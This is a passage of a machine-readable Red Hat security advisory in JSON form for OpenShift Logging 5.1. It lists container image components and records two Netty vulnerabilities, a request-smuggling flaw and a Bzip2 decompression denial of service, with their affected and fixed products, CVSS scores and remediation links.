"product_reference": "openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x as a component of OpenShift Logging 5.1",
"product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x"
},
"product_reference": "openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64 as a component of OpenShift Logging 5.1",
"product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64"
},
"product_reference": "openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x as a component of OpenShift Logging 5.1",
"product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x"
},
"product_reference": "openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le as a component of OpenShift Logging 5.1",
"product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le"
},
"product_reference": "openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x as a component of OpenShift Logging 5.1",
"product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x"
},
"product_reference": "openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le as a component of OpenShift Logging 5.1",
"product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le"
},
"product_reference": "openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64 as a component of OpenShift Logging 5.1",
"product_id": "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64"
},
"product_reference": "openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64",
"relates_to_product_reference": "8Base-OSE-LOGGING-5.1"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2021-21409",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2021-03-30T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1944888"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty. There is an issue where the content-length header is not validated correctly if the request uses a single Http2HeaderFrame with the endstream set to true. This flaw leads to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1. The highest threat from this vulnerability is to integrity.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty: Request smuggling via content-length header",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat Satellite ships a vulnerable Netty version embedded in Candlepin. However, it is not directly vulnerable since the HTTP requests are handled by Tomcat and not by Netty.\nRed Hat OpenStack Platform\u0027s OpenDaylight will not be updated for this flaw because it was deprecated as of OpenStack Platform 14 and is only receiving security fixes for Important and Critical flaws.\n\nIn OpenShift Container Platform (OCP), the Hive/Presto/Hadoop components that comprise the OCP Metering stack, ship the vulnerable version of netty-codec-http package.\nSince the release of OCP 4.6, the Metering product has been deprecated [1], hence the affected components are marked as wontfix.\nThis may be fixed in the future.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le"
],
"known_not_affected": [
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-21409"
},
{
"category": "external",
"summary": "RHBZ#1944888",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1944888"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-21409",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-21409"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21409",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21409"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-f256-j965-7f32",
"url": "https://github.com/netty/netty/security/advisories/GHSA-f256-j965-7f32"
}
],
"release_date": "2021-03-30T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T18:09:12+00:00",
"details": "For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nFor Red Hat OpenShift Logging 5.1, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.8/logging/cluster-logging-upgrading.html",
"product_ids": [
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5128"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "netty: Request smuggling via content-length header"
},
{
"cve": "CVE-2021-37136",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2021-09-14T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2004133"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty\u0027s netty-codec due to size restrictions for decompressed data in the Bzip2Decoder. By sending a specially-crafted input, a remote attacker could cause a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for decompressed data",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "In the OpenShift Container Platform (OCP), the Hive/Presto/Hadoop components that comprise the OCP Metering stack ship the vulnerable version of netty-codec package. Since the release of OCP 4.6, the Metering product has been deprecated [1], so the affected components are marked as wontfix. This may be fixed in the future.\n\nStarting in OCP 4.7, the elasticsearch component is shipping as a part of the OpenShift Logging product (openshift-logging/elasticsearch6-rhel8). The elasticsearch component delivered in OCP 4.6 is marked as `Out of support scope` because these versions are already under Maintenance Phase of the support.\n\n[1] https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html#ocp-4-6-metering-operator-deprecated",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le"
],
"known_not_affected": [
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le",
